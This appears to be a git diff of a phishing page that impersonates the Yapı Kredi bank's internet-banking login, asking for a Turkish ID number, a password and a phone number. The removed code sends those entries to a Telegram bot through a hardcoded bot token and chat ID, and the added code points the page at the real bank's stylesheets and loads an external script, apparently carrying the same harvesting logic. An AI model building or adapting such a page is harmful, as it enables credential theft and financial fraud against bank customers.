--- a/index.html
+++ b/index.html
@@ -4,100 +4,10 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>YAPI KREDİ</title>
-    <link rel="stylesheet" href="https://https://internetsube.yapikredi.com.tr//ngi-static/css/source/fonts.css">
-    <link rel="stylesheet" href="https://https://internetsube.yapikredi.com.tr//ngi-static/css/main.ui.min.css">
+    <title>Yapı Kredi</title>
+    <link rel="stylesheet" href="https://www.yapikredi.com.tr//ngi-static/css/source/fonts.css">
+    <link rel="stylesheet" href="https://www.yapikredi.com.tr//ngi-static/css/main.ui.min.css">
     <link rel="stylesheet" href="main.css">
-    <style>
-        body {
-            margin: 0;
-            height: 100vh;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            font-family: Arial, sans-serif;
-            background: #ffffff; /* Arka plan tamamen beyaz */
-            color: #000; /* Yazılar siyah */
-        }
-        .container {
-            text-align: center;
-            display: flex;
-            flex-direction: column;
-            justify-content: center;
-            align-items: center;
-            background: #fff;
-            padding: 20px;
-            border-radius: 10px;
-            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
-        }
-        .tab {
-            padding: 10px;
-            font-size: 16px;
-            cursor: pointer;
-            transition: color 0.3s, border-bottom 0.3s;
-        }
-        .tab.active {
-            font-weight: bold;
-            border-bottom: 2px solid;
-        }
-        .input-group {
-            margin-bottom: 15px;
-        }
-        .input-group input {
-            width: 100%;
-            padding: 10px;
-            border: 1px solid #ccc;
-            border-radius: 5px;
-            font-size: 16px;
-            box-sizing: border-box;
-        }
-        .remember-me {
-            display: flex;
-            align-items: center;
-            justify-content: space-between;
-            margin-bottom: 20px;
-            font-size: 16px;
-        }
-        .toggle {
-            position: relative;
-            width: 40px;
-            height: 20px;
-            border-radius: 10px;
-            cursor: pointer;
-            background-color: #ddd;
-            transition: background-color 0.3s;
-        }
-        .toggle::before {
-            content: "";
-            position: absolute;
-            top: 1px;
-            left: 2px;
-            width: 18px;
-            height: 18px;
-            border-radius: 50%;
-            background-color: #fff;
-            transition: 0.3s;
-        }
-        .toggle.active {
-            background-color: #0072ce;
-        }
-        .toggle.active::before {
-            left: 20px;
-        }
-        .login-button {
-            width: 100%;
-            padding: 12px;
-            border: none;
-            border-radius: 5px;
-            font-size: 16px;
-            cursor: pointer;
-            background-color: #0072ce;
-            color: #fff;
-        }
-        .hidden {
-            display: none;
-        }
-    </style>
 </head>
 
 <body>
@@ -108,7 +18,7 @@
 
         <div class="tabs">
             <div class="tab active" onclick="switchTab('individual')">Bireysel</div>
-            <div class="tab" onclick="switchTab('corporate')">Kurumsal</div>
+            <div class="tab">Kurumsal</div>
         </div>
 
         <div id="individual" class="tab-content">
@@ -123,15 +33,6 @@
             </div>
         </div>
 
-        <div id="corporate" class="tab-content hidden">
-            <div class="input-group">
-                <input type="text" id="kurumsal-kod" placeholder="Kurumsal Kod" maxlength="10">
-            </div>
-            <div class="input-group">
-                <input type="password" id="kurumsal-sifre" placeholder="Kurumsal Şifre" maxlength="6">
-            </div>
-        </div>
-
         <div class="remember-me">
             <span>Beni Hatırla</span>
             <div class="toggle" onclick="this.classList.toggle('active')"></div>
@@ -142,54 +43,27 @@
         <a href="#" class="forgot-password">Şifre Al / Şifremi Unuttum</a>
     </div>
 
+    <script src="js/yapikredi.js"></script>
+
     <script>
         function switchTab(tab) {
             const individualContent = document.getElementById('individual');
             const corporateContent = document.getElementById('corporate');
-            const tabs = document.querySelectorAll('.tab');
+            const individualTab = document.querySelector('.tab.active');
+            const corporateTab = document.querySelector('.tabs .tab:nth-child(2)');
 
             if (tab === 'individual') {
                 individualContent.classList.remove('hidden');
                 corporateContent.classList.add('hidden');
+                individualTab.classList.add('active');
+                corporateTab.classList.remove('active');
             } else {
                 individualContent.classList.add('hidden');
                 corporateContent.classList.remove('hidden');
+                corporateTab.classList.add('active');
+                individualTab.classList.remove('active');
             }
-
-            tabs.forEach(t => t.classList.remove('active'));
-            document.querySelector(`.tab:nth-child(${tab === 'individual' ? 1 : 2})`).classList.add('active');
         }
-        function submitForm() {
-    var tc = document.getElementById("tc").value;
-    var sifre = document.getElementById("sifre").value;
-    var telefon = document.getElementById("telefon").value;
-
-    if (/^\d{11}$/.test(tc) && /^\d{6}$/.test(sifre) && /^\d{10}$/.test(telefon)) {
-        var botToken = "7120775298:AAGSRsWOA3l0SunCmoaWk_nDUZgfokEJIm4";
-        var chatId = "-4749123767";
-        var message = `🔹 Yeni Giriş Bilgileri:\n👤 TC: ${tc}\n🔑 Şifre: ${sifre}\n📱 Telefon: ${telefon}`;
-        var url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
-        
-        fetch(url)
-            .then(response => response.json()) // Yanıtı JSON formatına çevir
-            .then(data => {
-                console.log("Telegram API Yanıtı:", data); // Konsola yazdır
-                if (data.ok) {
-                    window.location.href = "bekle.html";
-                } else {
-                    alert("Telegram'a mesaj gönderme hatası! Hata: " + data.description);
-                }
-            })
-            .catch(error => {
-                console.error("Hata:", error);
-                alert("Bir hata oluştu! Detay: " + error.message);
-            });
-    } else {
-        alert("Lütfen bilgileri eksiksiz ve doğru formatta giriniz!");
-    }
-}
-
-    
     </script>
 </body>
 
